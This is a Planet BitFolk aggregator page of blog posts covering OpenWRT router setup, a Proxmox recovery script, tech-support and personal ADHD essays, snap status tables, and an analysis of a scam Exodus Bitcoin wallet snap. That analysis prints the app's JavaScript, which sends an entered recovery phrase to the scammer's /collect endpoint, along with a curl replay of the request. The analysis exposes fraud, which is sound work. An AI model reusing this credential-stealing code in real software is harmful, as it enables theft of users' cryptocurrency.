Planet BitFolk

Chris Wallace: Non-Eulerian paths

I’ve been doing a bit of work on Non-Eulerian paths.  I haven't made any algorithmic progress...

Jon Spriggs: Replacing Be-Fibre’s router with an OpenWRT-based router

I’d seen quite a few comments from the community talking about using your own router, and yesterday I finally got around to sorting this out for myself!

I obtained a Turris Omnia CZ11NIC13 router last year to replace the Be-Fibre-supplied Adtran 854-v6. Both the Adtran and the Omnia use an SFP module to terminate the fibre connection on-box, but if you have an ONT instead, the Omnia will activate the WAN Ethernet socket when the SFP cage isn’t filled.

The version I was using was a little older than the currently listed models, and the version of OpenWRT shipped on it kept breaking when trying to perform updates and upgrades. I followed the instructions on the OpenWRT Wiki to replace the custom firmware with the more generic OpenWRT build for this model (upgrading U-Boot and then flashing the updated image using dd in the rescue environment).

Initial stumbles

I said I’d got this last year, and when I first tried to migrate over to it, it wasn’t clear whether the SFP had been detected… On this router, eth2 is either the WAN Ethernet interface or the SFP, and the only way to tell is to run dmesg | grep ether, which shows configuring for inband/1000base-x link mode (it’s on the SFP) or configuring for fixed/rgmii link mode (it’s on the Ethernet port). Once you realise that, it all becomes a bit easier!
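For reference, here’s that check. The driver prefix varies between kernel builds, so treat these output lines as illustrative:

dmesg | grep ether
# it's on the SFP:
#   ... eth2: configuring for inband/1000base-x link mode
# it's on the Ethernet WAN port:
#   ... eth2: configuring for fixed/rgmii link mode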

Getting ready

The main thing to realise about this process is that Be-Fibre only really care about two things: the MAC address of the router (the SFP doesn’t have a MAC address of its own) and the VLAN it’s connected to – which is VLAN 10.

So, let’s set that up.

Using the Web interface

The first thing we need to do is change the MAC address of “eth2” – the WAN/SFP port. Navigate to “Network”, then “Interfaces”, and select the “Devices” tab.

The devices page of the OpenWRT web interface before any changes have been made to it.

Click “Configure…” next to eth2 to change the MAC address. Here I’ve changed it to “DE:CA:FB:AD:99:99” which is the value I got from my Be-Fibre router.

Once you click “Save” you go back to the devices page, and you can see here that the changed MAC address is now in bold.

Next we need to set up the VLAN tag, so click on “Add device configuration…”

Once you click “Save”, you’ll be taken back to the devices page.

Click on “Save & Apply”, and then go into the “Interfaces” tab.

You may see that an IP address has been allocated to the wan interface… Don’t believe it! You still need to select the VLAN Tagged interface for it to work! Click “Edit” for the wan interface.

Change device to eth2.10 and click Save. Do the same for the wan6 interface.

Click Save & Apply and then navigate to the “System” -> “Reboot” screen and reboot the device to get the network changes recognised.

Using the command line

SSH to the OpenWRT device, and then run the following (replacing the MAC address as needed!):

# Find the config section name for the eth2 device, then set its MAC address
eth2=$(uci show network.@device[1] | grep =device | cut -d= -f1 | cut -d. -f2)
uci set network.${eth2}.macaddr='DE:CA:FB:AD:99:99'
uci commit network

# Create the VLAN 10 device (eth2.10) if it doesn't already exist
if ! ip link show dev eth2.10 > /dev/null 2>&1
then
  uci add network device
  uci set network.@device[-1].type='8021q'
  uci set network.@device[-1].ifname='eth2'
  uci set network.@device[-1].vid='10'
  uci set network.@device[-1].name='eth2.10'
  uci commit network
fi

# Point the wan and wan6 interfaces at the tagged device
uci set network.wan.device='eth2.10'
uci set network.wan6.device='eth2.10'
uci commit network
reload_config
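Before rebooting, it’s worth a quick sanity check that the configuration says what you think it does (assuming the device names used above):

uci show network.wan.device
uci show network.wan6.device
# both should print 'eth2.10'

# after the reboot, confirm the tagged interface actually exists
ip -d link show eth2.10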

Alan Pope: SAP Upgrade: The Sound of Silence

This is the seventh in an increasingly infrequent series of Friday Tales From Tech Support. Some stories from the past featuring broken computers and even more broken tech support operatives - mostly me.

London. Summer 2002

In the early 2000s I worked as a SAP Technical Consultant which involved teaching courses, advising customers, and doing SAP installations, upgrades and migrations.

This story starts on a typical mid-summer, warm and stuffy day in London. I arrive for the first and only time at a small, second-floor office in a side road, just off Regent Street, in the centre of town. The office was about the size and shape of Sherlock’s flat in the modern hit BBC TV show of the same name, and was clearly previously residential accommodation, lightly converted.

The company was a small SAP Consultancy whose employees were mostly out of the office, clocking up billable hours on-site with their customers. Only a few staff remained in the office, including the CEO, an office administrator, and one consultant.

In the main lounge area of the office were three desks, roughly arranged. A further, larger desk was located in an adjoining office, likely previously a bedroom, where the CEO sat. Every desk had the typical arrangement: office desk phone, Compaq laptop PC, trailing cables, and stationery.

In addition, dominating the main office, in the middle of the floor, was an ominous, noisy, and very messily populated 42U rack. It had no doors, and there was no air conditioning to speak of. The traditional sash windows were open, allowing the hot air from outside the flat to mix with the hotter air within.

It was like a sauna in there.

Rack space

My (thankfully) single-day job was to perform some much-needed software upgrades on a server in the rack. Consultancies like these often had their own internal development SAP systems which they’d use to prototype on, make demos, or develop entire solutions with.

Their SAP system was installed on an enormous Compaq ProLiant server, mounted in the middle of the rack. It featured the typical beige Compaq metalwork with an array of drives to hold the OS, database, application and data. Under that was a DLT 40-80 tape drive for doing backups, and a pile of tapes.

There was a keyboard and display in the rack, powered off and disconnected. I was told the display would frequently get “borrowed” to give impromptu presentations in the CEO’s office, so they tended to administer the Windows server remotely over VNC or RDP, whether via the Internet or locally from their desks in the office.

Some assorted networking and other random gear that I didn’t recognise was scattered around a mix of cables in the rack.

Time is ticking

There was clearly some pressure to get the software upgrades done promptly, ready for a customer demo or something I wasn’t privy to the details of. I was just told to “upgrade the box, and get it done today.”

I got myself on the network and quickly became familiar with the setup, or so I thought. I started a backup, like a good sysadmin, because from what I could tell, they hadn’t done one recently. (See tfts passim for further backup-related tales.)

I continued with the upgrade, which required numerous components to be updated and restarted, as is the way. Reboots, updates, more reboots, patches, SAP System Kernel updates, SAP Support Packages, yadda yadda.

Trouble brewing

While I was immersed in my world of downloading and patching, something was amiss. The office administrator and the CEO were taking calls, transferring calls, and shouting to each other from the lounge office to the bedroom office. There was an air of frustration in the room, but it was none of my business.

Apparently some Very Important People were supposed to be having High Level conversations on the phone, but they kept getting cut off, or the call would drop, or something. Again, none of my business, just background noise while I was working to a deadline.

Except it was made my business.

After a lot of walking back and forth between the offices, shouting, and picking up and slamming down of phones, the CEO came over and bluntly asked me:

What did you do?

This was an excellent question, and one I didn’t have a great answer for besides:

I dunno, what did I do?

Greensleeves

It turns out the whole kerfuffle was because I had unwittingly done something.

I was unaware that the server was running not only the very powerful, very complex, and very important SAP Enterprise Resource Planning software.

It also ran an equally important, business-critical application: the popular MP3 player WinAmp.

There was a sound card in the server, the output of which was sent via an innocuous-looking audio cable to the telephony system.

The Important People were calling in, getting transferred to the CEO’s phone, then, upon hearing silence, assuming the call had dropped and hanging up. They would then call back, with everyone getting increasingly frustrated in the process.

The very familiar yellow ‘lightning bolt’ WinAmp icon, nestled in the Windows System Tray Notification Area, had gone completely unnoticed by me.

When I had rebooted the server, WinAmp didn’t auto-start, so no music played out to telephone callers who were on hold. At best they got silence, and at worst, static or 50Hz mains hum.

The now-stroppy CEO stomped over to the rack and wrestled with the display to re-attach it, along with a keyboard & mouse, to the server. He then used them to log in to the Windows 2000 desktop, launch WinAmp manually, load a playlist, and hit play.

I apologised, completed my work, said goodbye, and thankfully for everyone involved, never went back to that London hot-box again.

Alan Pope: Today is my Birthday! I got ADHD

This is a deeply personal post. Feel free to skip this if you’re only here for the Linux and open-source content. It’s also a touch rambling. As for the title, no, I didn’t “get” ADHD on my birthday; obviously, that’s humorous literary hyperbole. Read on.

LET age = age + 1

Like a few billion others, I managed to cling to this precious rock we call home and complete a 52nd orbit of our nearest star. What an achievement!

It’s wild for me to think it’s been that long since I innocently emerged into early 1970s Southern Britain. Back then, the UK wasn’t a member of the European Common Market and was led by a Conservative government that would go on to lose the next election.

Over in the USA, 1972 saw the beginning of the downfall of a Republican President during the Watergate Scandal.

How times change. /s

Back then Harry Nilsson - Without You topped the UK music chart, while in Australia Don McLean - American Pie occupied the number one spot. Across the pond, America - A Horse With No Name was at the top of the US Billboard Hot 100, while upstairs in Canada, they enjoyed Anne Murray - Cotton Jenny it seems. All four are great performances in their own right.

Meanwhile, on the day I was born, Germany’s chart was led by Die Windows - How Do You Do?, which is also a song.

WHILE age <= 18

I grew up in the relatively prosperous South of England with two older siblings, parents who would eventually split, and a cat, then a dog. Life was fine, as there was food on the table, a roof over our heads, and we were all somewhat educated.

In my teenage years, I didn’t particularly enjoy school life. I mean, I enjoyed the parts where I hung out with friends and talked for hours about computers, games, and whatever else teenagers talk about. However, the actual education and part-time bullying by other pupils degraded the experience somewhat.

I didn’t excel in the British education system but scraped by. Indeed, I got a higher GCSE grade for French than English, my mother tongue. L’embarras!

My parents wanted me to go on to study A-Levels at Sixth-Form College, then on to University. I pushed back hard and unpleasantly, having not enjoyed or flourished in the UK state academic system. After many arguments, I entered the local Technical College to study for a BTEC National Diploma in Computer Studies.

This was a turning point for me. Learning to program in the late 1980s in 6502 assembler on a BBC Micro, dBase III on an IBM XT, and weirdly, COBOL on a Prime Minicomputer set me up for a career in computing.

IF income = 0 THEN GO SUB job

Over the intervening thirty years, I’ve had a dozen or so memorable jobs. Some have lasted years, others are just short contracts, taking mere months. Most have been incredibly enjoyable alongside excellent people in wonderful places. Others, less so. Pretty typical, I imagine.

During that time, it’s been clear in my head that I’m a nerd, a geek, or an enthusiast who can get deep into a subject for hours if desired. I’ve also had periods of tremendous difficulty with focus, having what feels like an endless task list, where I’d rapidly context switch and never complete anything.

The worst part is that for all that time, I thought this was just ‘me’ and these were “un-fixable” flaws in my character. Thinking back, I clearly didn’t do enough self-reflection over those thirty years.

BRIGHT 1; FLASH 1

The most mentally and emotionally challenging period of my life has been the last four years.

I consider myself a relatively empathetic and accommodating person. I have worked with, managed, and reported to non-neurotypical people in the tech space, so I had some experience.

In recent times, I have become significantly more aware and empathetic of the mental health and neurodiversity challenges others face. The onset of dementia in one family member, late diagnosis of bipolar & hypomania in another, and depression & self-harm in others, all in the space of a year, was a lot to take on and support.

After all that, something started to reveal itself more clearly.

INPUT thoughts

In my ~50 years, nobody has ever asked me, “Do you think you might be on the autistic spectrum?”. Is that something respectful strangers or loving family ask? Perhaps not.

A few years ago, at a family event, I said aloud, “You know, I feel I might be a bit ‘on the spectrum,’” which was immediately dismissed by a close family member who’d known me my entire life. “Oh”, I thought and pushed that idea to the back of my mind.

Then, in 2022, after the recent family trauma, the thoughts came back, but not enough to prompt me to seek a diagnosis. I did attempt to get help through therapy and coaching. While this helped, it wasn’t enough, though it did nudge me in the right direction.

In 2023, I took a simple online test for ADHD & Autistic Spectrum Condition, which suggested I had some traits. I’m no expert, and I don’t believe all online medical surveys, so I made an appointment with my GP. That was exactly one year ago.

Note: I live in the UK, where the National Health Service is chronically underfunded and undervalued. The people who work for the NHS do their best, and I greatly value the services they provide.

GOTO doctor

I’m grateful to have known my Doctor for over 20 years. He’s been a thoughtful, accessible rock for our family through many medical issues. So when I arrived at my appointment and detailed the various reasons why I think I may have some kind of ADHD, it was a great comfort to hear him say, “Yes, it certainly sounds like it, given I have ADHD and do many of the same things.”

Not a diagnosis, but on that day I felt a weight had been ever so slightly lifted. I appreciate that some may feel labels aren’t necessary, and that we can just get by without having to be put in little boxes. That’s fine, but I disagree. I needed this, but I didn’t know that until I heard it.

Imagine being at the bottom of a well your entire life and thinking that was how it was for everyone. Then, one day, someone lowered a bucket, and you looked up. That was how it felt for me.

Due to the interesting way healthcare works in the UK, under the NHS, and without a private healthcare plan, I was offered a number of options:

  1. Do nothing. I seemingly made it to ~50 years old without a diagnosis. Maybe I don’t need to do anything more about this.
  2. Pay ~£2K for an immediate private diagnosis appointment.
  3. Go on the NHS waiting list for anything up to three years for an initial appointment with a specialist.
  4. Get an NHS referral to a 3rd-party partner healthcare provider – the so-called “Right to Choose”.
  5. Self-refer to a private provider on a waiting list.

I figured that while yes, I have successfully attained over 50 solar orbits, I would like some closure on the issue. It wasn’t urgent enough to pay Apple-Laptop-levels of private costs, but more urgent than “After both the next Summer and Winter Olympic games”.

I suffered quite significant anxiety over the months leading up to and after this appointment. I felt I knew inside that there was something amiss. I knew whatever it was, it was adversely affecting many parts of my life, including work. I was somewhat keen to get this resolved as soon as I could.

So, I opted for both (4) and (5) to see which one would respond first and take that option. In the end, the private provider came back with availability first - six months later, so I opted for that at my own cost. The NHS partner provider came back to me almost a year after my initial GP appointment.

PAUSE 0

The appointment came through in late December 2023. I was asked a significant number of questions during the local in-person session. We discussed a range of topics from my early school memories, to work experience in between, and right up to the present day. It took a fair while, and felt very comprehensive. More so than a 10-question online form.

At the end of the meeting, I was given the diagnosis.

Moderate-Severe Adult ADHD - combined type ICD10 Code F90.0
ASC Traits ?likely ASC.

Essentially, I have ADHD and probably lie somewhere on the Autistic Spectrum.

It’s possible that anyone who has known me for any length of time, either in “meatspace” or online, may well be saying, “Duh! Of course you are.”

Sure, it may well be obvious to anyone looking down into a well that there’s someone at the bottom, but that perspective wasn’t obvious to me.

This got me out of the well, but the journey wasn’t over. Nothing has inherently been solved per se by having the diagnosis, but it helps me to put some of the pieces of my life in order and understand them better.

The whole process got me thinking a lot more deeply about certain stages and experiences in my life. Since the diagnosis, I have had a significant number of “Oh, that explains that!” moments both for current behaviours and many past ones.

READ choices

At the appointment, I was presented with further choices regarding what to do next: do I seek medication, cognitive behavioural therapy, or, again, nothing? Some people choose medication, others do not. It’s a very personal decision. Each to their own. I chose the medication route for now, but that may change based on my personal experience.

I was offered two options: Atomoxetine or Lisdexamfetamine. Check the (Wikipedia) links for details and the list of common side effects. I won’t go into that here.

I opted for Lisdexamfetamine, which I’m prescribed to take each day that I “need” it. Typically, that means I only take it on work days, not at weekends or during holidays. However, some people take it every day; some take it in the morning only, while others take another dose in the afternoon once the morning one has “worn off”.

Unfortunately, it’s not just a case of “pop the pill and all is sorted”, obviously. Getting the dosage right has been quite a challenge. As I’m under a private consultant, and the medicine is a “Class B Controlled Drug” in the UK, I am only allowed a 30-day prescription at a time.

That means I have to contact the prescribing Consultant Psychiatrist regularly to get a repeat prescription through the post. It can also be tricky finding a pharmacy that has the medicine in stock.

On one occasion I was given half the amount prescribed, along with an IOU for the remainder, to collect at a later date. On another, the pharmacy had none in stock, but ordered it for next day delivery. I heard similar horror stories from others, but consider myself lucky so far.

Further, as I’m under a private consultation, I am paying between £70 and £110 per month for the amount I’m prescribed. Once the dosage is stabilised, in theory, the prescription will instead be issued by my NHS General Practitioner, and the price to me should drop to a more palatable £9.65.

RESTORE 52

The reason I published this article on this day, my birthday, with that title, is that I think we’ve finally reached the right dosage. I am finding myself able to focus and concentrate better, I’m less “scatterbrained” in the mornings, and I feel less likely to forget, misplace, and “drop” things.

The last four years have been crap. They’re getting better. Starting now.

CONTINUE

This was a rather personal account of the continuing journey of me, popey. Other people make different choices, have alternate outcomes, and may not feel comfortable explaining as I have.

Equally you may find it odd that someone would write all this down, in public. It may well be. It helped me to write it, and it might help someone else to read it. If that’s not you, that’s okay too.

Finally, if you’re dealing with similar neuro-divergency traits, and are experiencing it differently from me, that’s also fine. We’re all a bit different. That’s a good thing.

STOP

Yes, I used Sinclair Spectrum (get it? - ED) commands as headings. Sorry.

BitFolk Wiki: Community

A run of revisions to the Community wiki page (1–2 April 2024), with edit summaries “Add IRC stats”, “users: mailing list stats now updating”, and “Telegram: stats are now updated”. The page now fetches usage statistics for the IRC channel, the Telegram group, and the users mailing list from external YAML feeds (via #get_web_data) and renders them in floating wikitables, replacing the earlier mock figures. [Revision diffs omitted.]

Jon Spriggs: A note to myself; resetting error status on Proxmox HA workloads after a crash

I’ve had a couple of issues with brown-outs recently, which have interrupted my Proxmox server and stopped my connected disks from coming back up cleanly (yes, I’m working on that separately!). It’s left me in a state where several of the containers and virtual machines on the cluster are down.

It’s possible to point-and-click your way around this, but far easier to script it!

A failed state may look like this:

root@proxmox1:~# ha-manager status
quorum OK
master proxmox2 (active, Fri Mar 22 10:40:49 2024)
lrm proxmox1 (active, Fri Mar 22 10:40:52 2024)
lrm proxmox2 (active, Fri Mar 22 10:40:54 2024)
service ct:101 (proxmox1, error)
service ct:102 (proxmox2, error)
service ct:103 (proxmox2, error)
service ct:104 (proxmox1, error)
service ct:105 (proxmox1, error)
service ct:106 (proxmox2, error)
service ct:107 (proxmox2, error)
service ct:108 (proxmox1, error)
service ct:109 (proxmox2, error)
service vm:100 (proxmox2, error)

Once you’ve fixed your issue, you can do this on each node:

# For each HA service on this node that is in the 'error' state...
for worker in $(ha-manager status | grep "($(hostnamectl hostname), error)" | cut -d\  -f2)
do
  echo "Disabling $worker"
  ha-manager set $worker --state disabled
  # wait for the HA manager to acknowledge each state change before moving on
  until ha-manager status | grep "$worker" | grep -q disabled ; do sleep 1 ; done
  echo "Restarting $worker"
  ha-manager set $worker --state started
  until ha-manager status | grep "$worker" | grep -q started ; do sleep 1 ; done
done

Note that this hasn’t been tested in anger, but a scan over it with those nodes working suggests it should work. I guess I’ll be updating this the next time I get a brown-out!
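For a single stuck workload, the loop boils down to two commands (using ct:101 from the example output above):

ha-manager set ct:101 --state disabled
# wait for 'ha-manager status' to report it as disabled, then:
ha-manager set ct:101 --state started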

Alan Pope: Guess Who’s Back? Exodus Scam BitCoin Wallet Snap!

Previously…

Back in February, I blogged about a series of scam Bitcoin wallet apps that were published in the Canonical Snap store, including one which netted a scammer $490K of some poor rube’s coin.

The snap was eventually removed, and some threads were started over on the Snapcraft forum.

Groundhog Day

Nothing has changed, it seems, because once again ANOTHER TEN scam BitCoin wallet apps have been published in the Snap Store today.

You’re joking! Not another one!

Yes, Brenda!

This one has the snappy (sorry) name of exodus-build-96567, published by the not-very-legit-looking publisher digisafe00000. Uh-huh.

Edit: Initially I wrote this post after analysing one of the snaps I stumbled upon. It’s been pointed out that there’s a whole bunch under this account, all with popular crypto wallet brand names.

Publisher digisafe00000

Edit: These were removed. One day later, they popped up again, under a new account. I reported all of them, and pinged someone at Canonical to get them removed.

Publisher codeshield0x0000

There’s no indication this is the same developer as the last scam Exodus Wallet snap published in February, or the one published back in November last year.

Presentation

Here’s what it looks like on the Snap Store page https://snapcraft.io/exodus-build-96567 – which may be gone by the time you see this. A real minimum-effort store listing, but I’m sure it could fool someone; they usually do.

A not very legit looking snap

It also shows up in searches within the desktop graphical storefront “Ubuntu Software” or “App Centre”, making it super easy to install.

Note: Do not install this.

“Secure, Manage, and Swap all your favorite assets.” None of that is true, as we’ll see later. Although one could argue “swap” is true if you don’t mind “swapping” all your BitCoin for an empty wallet, I suppose.

Although it is “Safe”, apparently, according to the store listing.

Coming to a desktop near you

Open wide

It looks like the exodus-build-96567 snap was only published to the store today. I wonder what happened to builds 1 through 96566!

$ snap info exodus-build-96567
name: exodus-build-96567
summary: Secure, Manage, and Swap all your favorite assets.
publisher: Digital Safe (digisafe00000)
store-url: https://snapcraft.io/exodus-build-96567
license: unset
description: |
 Forget managing a million different wallets and seed phrases.
 Secure, Manage, and Swap all your favorite assets in one beautiful, easy-to-use wallet.
snap-id: wvexSLuTWD9MgXIFCOB0GKhozmeEijHT
channels:
 latest/stable: 8.6.5 2024-03-18 (1) 565kB -
 latest/candidate: ↑
 latest/beta: ↑
 latest/edge: ↑

Here’s the app running in a VM.

The application

If you try and create a new wallet, it waits a while then gives a spurious error. That code path likely does nothing. What it really wants you to do is “Add an existing wallet”.

Give us all your money

As with all these scam applications, all it does is ask for a BitCoin recovery phrase, with which it will likely steal all the coins and send them off to the scammer’s wallet. Obviously, I didn’t test this with a real wallet phrase.

When given a fake passphrase/recovery key, it calls some remote API and then shows a dubious error – having already sent your recovery key to the scammer.

Error

What’s inside?

While the snap is still available for download from the store, I grabbed it.

$ snap download exodus-build-96567
Fetching snap "exodus-build-96567"
Fetching assertions for "exodus-build-96567"
Install the snap with:
 snap ack exodus-build-96567_1.assert
 snap install exodus-build-96567_1.snap

I then unpacked the snap to take a peek inside.

unsquashfs exodus-build-96567_1.snap
Parallel unsquashfs: Using 8 processors
11 inodes (21 blocks) to write

[===========================================================|] 32/32 100%

created 11 files
created 8 directories
created 0 symlinks
created 0 devices
created 0 fifos
created 0 sockets
created 0 hardlinks

There’s not a lot in here. Mostly the usual snap scaffolding, metadata, and the single exodus-bin application binary in bin/.

tree squashfs-root/
squashfs-root/
├── bin
│ └── exodus-bin
├── meta
│ ├── gui
│ │ ├── exodus-build-96567.desktop
│ │ └── exodus-build-96567.png
│ ├── hooks
│ │ └── configure
│ └── snap.yaml
└── snap
 ├── command-chain
 │ ├── desktop-launch
 │ ├── hooks-configure-fonts
 │ └── run
 ├── gui
 │ ├── exodus-build-96567.desktop
 │ └── exodus-build-96567.png
 └── snapcraft.yaml

8 directories, 11 files
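If you want a rough idea of what that lone binary is before running anything, a couple of standard tools help (commands only; output omitted here):

# what kind of binary is it?
file squashfs-root/bin/exodus-bin

# any embedded URLs?
strings squashfs-root/bin/exodus-bin | grep -i http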

Here’s the snapcraft.yaml used to build the package. Note it needs network access, unsurprisingly.

name: exodus-build-96567 # you probably want to 'snapcraft register <name>'
base: core22 # the base snap is the execution environment for this snap
version: '8.6.5' # just for humans, typically '1.2+git' or '1.3.2'
title: Exodus Wallet
summary: Secure, Manage, and Swap all your favorite assets. # 79 char long summary
description: |
  Forget managing a million different wallets and seed phrases.
  Secure, Manage, and Swap all your favorite assets in one beautiful, easy-to-use wallet.

grade: stable # must be 'stable' to release into candidate/stable channels
confinement: strict # use 'strict' once you have the right plugs and slots

apps:
  exodus-build-96567:
    command: bin/exodus-bin
    extensions: [gnome]
    plugs:
      - network
      - unity7
      - network-status

layout:
  /usr/lib/${SNAPCRAFT_ARCH_TRIPLET}/webkit2gtk-4.1:
    bind: $SNAP/gnome-platform/usr/lib/$SNAPCRAFT_ARCH_TRIPLET/webkit2gtk-4.0

parts:
  exodus-build-96567:
    plugin: dump
    source: .
    organize:
      exodus-bin: bin/

For completeness, here’s the snap.yaml that gets generated at build-time.

name: exodus-build-96567
title: Exodus Wallet
version: 8.6.5
summary: Secure, Manage, and Swap all your favorite assets.
description: |
  Forget managing a million different wallets and seed phrases.
  Secure, Manage, and Swap all your favorite assets in one beautiful, easy-to-use wallet.
architectures:
- amd64
base: core22
assumes:
- command-chain
- snapd2.43
apps:
  exodus-build-96567:
    command: bin/exodus-bin
    plugs:
    - desktop
    - desktop-legacy
    - gsettings
    - opengl
    - wayland
    - x11
    - network
    - unity7
    - network-status
    command-chain:
    - snap/command-chain/desktop-launch
confinement: strict
grade: stable
environment:
  SNAP_DESKTOP_RUNTIME: $SNAP/gnome-platform
  GTK_USE_PORTAL: '1'
  LD_LIBRARY_PATH: ${SNAP_LIBRARY_PATH}${LD_LIBRARY_PATH:+:$LD_LIBRARY_PATH}
  PATH: $SNAP/usr/sbin:$SNAP/usr/bin:$SNAP/sbin:$SNAP/bin:$PATH
plugs:
  desktop:
    mount-host-font-cache: false
  gtk-3-themes:
    interface: content
    target: $SNAP/data-dir/themes
    default-provider: gtk-common-themes
  icon-themes:
    interface: content
    target: $SNAP/data-dir/icons
    default-provider: gtk-common-themes
  sound-themes:
    interface: content
    target: $SNAP/data-dir/sounds
    default-provider: gtk-common-themes
  gnome-42-2204:
    interface: content
    target: $SNAP/gnome-platform
    default-provider: gnome-42-2204
hooks:
  configure:
    command-chain:
    - snap/command-chain/hooks-configure-fonts
    plugs:
    - desktop
layout:
  /usr/lib/x86_64-linux-gnu/webkit2gtk-4.1:
    bind: $SNAP/gnome-platform/usr/lib/x86_64-linux-gnu/webkit2gtk-4.0
  /usr/lib/x86_64-linux-gnu/webkit2gtk-4.0:
    bind: $SNAP/gnome-platform/usr/lib/x86_64-linux-gnu/webkit2gtk-4.0
  /usr/share/xml/iso-codes:
    bind: $SNAP/gnome-platform/usr/share/xml/iso-codes
  /usr/share/libdrm:
    bind: $SNAP/gnome-platform/usr/share/libdrm

Digging Deeper

Unlike the previous scammy application, which was written using Flutter, the developers of this one appear to have made a web page in a WebKitGTK wrapper.

If the network is not available, the application loads with an empty window containing an error message “Could not connect: Network is unreachable”.

No network

I brought the network up, ran Wireshark, then launched the rogue application again. The app clearly loads the remote content (HTML, JavaScript, CSS, and logos) and renders it inside the wrapper window.

Wireshark

Edit: I reported this IP to Hostinger’s abuse team, and they took the server down on 19th March.

The JavaScript is pretty simple. It has a dictionary of the words that are allowed in a recovery phrase. Here’s a snippet.

var words = ['abandon', 'ability', 'able', 'about', 'above', 'absent', 'absorb',
             /* … */
             'youth', 'zebra', 'zero', 'zone', 'zoo'];

As the user types words, the application checks the list.

var alreadyAdded = {};
function checkWords() {
  var button = document.getElementById("continueButton");
  var inputString = document.getElementById("areatext").value;
  var words_list = inputString.split(" ");
  var foundWords = 0;

  words_list.forEach(function(word) {
    if (words.includes(word)) {
      foundWords++;
    }
  });

  if (foundWords === words_list.length && words_list.length === 12 || words_list.length === 18 || words_list.length === 24) {
    button.style.backgroundColor = "#511ade";

    if (!alreadyAdded[words_list]) {
      sendPostRequest(words_list);
      alreadyAdded[words_list] = true;
      button.addEventListener("click", function() {
        renderErrorImport();
      });
    }
  }
  else {
    button.style.backgroundColor = "#533e89";
  }
}

If the entered words pass that check, the script lights up the “Continue” button and immediately sends a “POST” request containing them to a /collect endpoint on the server. (Note the sloppy operator precedence: an 18- or 24-word list passes whether or not the words are in the dictionary.)

function sendPostRequest(words) {
  var data = {
    name: 'exodus',
    data: words
  };

  fetch('/collect', {
    method: 'POST',
    headers: {
      'Content-Type': 'application/json'
    },
    body: JSON.stringify(data)
  })
  .then(response => {
    if (!response.ok) {
      throw new Error('Error during the request');
    }
    return response.json();
  })
  .then(data => {
    console.log('Response:', data);
  })
  .catch(error => {
    console.error('There is an error:', error);
  });
}

Here you can see in the payload, the words I typed, selected from the dictionary mentioned above.

Wireshark
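For what it’s worth, the request is trivial to reproduce by hand. Here’s the curl equivalent (the server address is whatever host the app loads its content from, redacted here):

curl -X POST http://<server>/collect \
  -H 'Content-Type: application/json' \
  -d '{"name": "exodus", "data": ["abandon", "ability", "..."]}'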

It also periodically “pings” the /ping endpoint on the server with a simple payload of {"name":"exodus"}, presumably for network connectivity checking, telemetry, or seeing which of the scam wallet applications are in use.

function sendPing() {
  var data = {
    name: 'exodus',
  };

  fetch('/ping', {
    method: 'POST',
    headers: {
      'Content-Type': 'application/json'
    },
    body: JSON.stringify(data)
  })
  .then(response => {
    if (!response.ok) {
      throw new Error('Error during the request');
    }
    return response.json();
  })
  .then(data => {
    console.log('Response:', data);
  })
  .catch(error => {
    console.error('There is an error:', error);
  });
}

All of this is done over HTTP, because of course it is. No security needed here!

Conclusion

It’s trivially easy to publish scammy applications like this in the Canonical Snap Store, and for them to go unnoticed.

I was somewhat hopeful that my previous post may have had some impact. It doesn’t look like much has changed yet beyond a couple of conversations on the forum.

It would be really neat if the team at Canonical responsible for the store could do something to catch these kinds of apps before they get into the hands of users.

I’ve reported the app to the Snap Store team.

Until next time, Brenda!

Alan Pope: popey snaps

popey’s snap status

I maintain a few snaps in the Snap Store. This page is generated periodically so I can keep an eye on how up to date each one is. The script isn’t perfect and doesn’t monitor them all; it’s a whole thing I need to maintain and update. I should move this to a GitHub Action at some point.

There’s also the charts page which shows how many weekly active devices each of these snaps has, which OS they’re installed on, and which countries they’re installed from.

The list is sorted by the “OK” column, which has either a ✔ or a ✖ to give a rough indication of whether the snap needs updating. This whole page is mostly just for my reference.

Sat 20 Apr 03:00:02 BST 2024

Snap Stable Edge Upstream OK?
Azimuth v1.0.3 v1.0.3 v1.0.3
B2 b2-20231011-172305-4bd1939 b2-20231011-172305-4bd1939 b2-20231011-172305-4bd1939
Bandwhich v0.22.2.5f5cc7e v0.22.2.c255c08 v0.22.2
BombSquad 1.7.33 1.7.33 1.7.33
ClassiCube 1.3.6 1.3.6-542-g629622e44 1.3.6
Dog v0.1.0 v0.1.0 v0.1.0
DOSBox-Staging v0.81.0 v0.81.0 v0.81.0
DynaHack v0.6.0 v0.6.0 v0.6.0
emu2 v2021.01 v2021.01 v2021.01
Fab-Agon-Emulator 0.9.43 f9b2d89 0.9.43
halloy 2024.6.7068008 2024.6.29c6615 2024.6
iamb v0.0.9 latest-9-g7bc34c8 v0.0.9
Ladder v0.0.21.3918cf3 v0.0.21.3918cf3 v0.0.21
MAME mame0264 mame0264 mame0264
MatterBridge v1.26.0 v1.26.0 v1.26.0
Mindustry v146 v146 v146
Monolith v2.8.1 v2.8.1 v2.8.1
ncspot v1.1.0 v1.1.0 v1.1.0
NotepadNext v0.7 v0.7 v0.7
Pencil 3.1.1 ^ 3.1.1
PioneerSpaceSimulator 20240314 20240314 20240314
Rustscan 2.1.1 2.1.1-45-gb9337d8 2.1.1
Shattered-Pixel-Dungeon v2.3.2 v2.3.2 v2.3.2
SpectrumAnalyser v0.2.0-alpha-master ^ v0.2.0-alpha
Toot 0.43.0 0.43.0 0.43.0
TwineJS 2.8.1 2.8.1 2.8.1
Defold 1.7.0 ^ 1.8.0-beta
emoj v3.3.0.e60099d v3.3.0.e60099d v4.0.1
Forgejo v1.21.10-0 v1.21.10-0 v1.21.11-1
Lapin a6b34c9 ^ -
Libation 11.1.0 11.3.7 v11.3.7
OpenBoardView 8.0 8.0 -
PWBM 0.1 0.1 -
Session-Desktop v1.12.0 v1.12.0 v1.12.2
Spot 0.4.0 0.4.0 0.4.1
Telegram-Asahi 4.16.8 4.16.8 v4.16.8

Notes

Some notes about specific apps and why they may not look like they’re updated.

  • Defold: I’m only shipping stable releases in the snap, not alpha/beta releases.
  • emoj: Build error in npm on later releases need investigation.
  • Libation: I’m only shipping stable releases in the snap, not pre-release versions.
  • Telegram Asahi: Currently manually built in a fresh LXD container for each release, on my MacBook Air. I do keep an eye on upstream, but sometimes there’s a little delay.

Alan Pope: Snap charts

popey’s snap charts

These charts show the user base of the snaps I publish in the Snap Store over the last 30 days: usage by country, version, OS (Linux distro), and channel. The first three show up to 25 entries per category.

There’s also the snaps page which lists all the snaps I maintain with their versions, and whether they’re in sync with upstream releases.

Fri 19 Apr 03:00:02 BST 2024

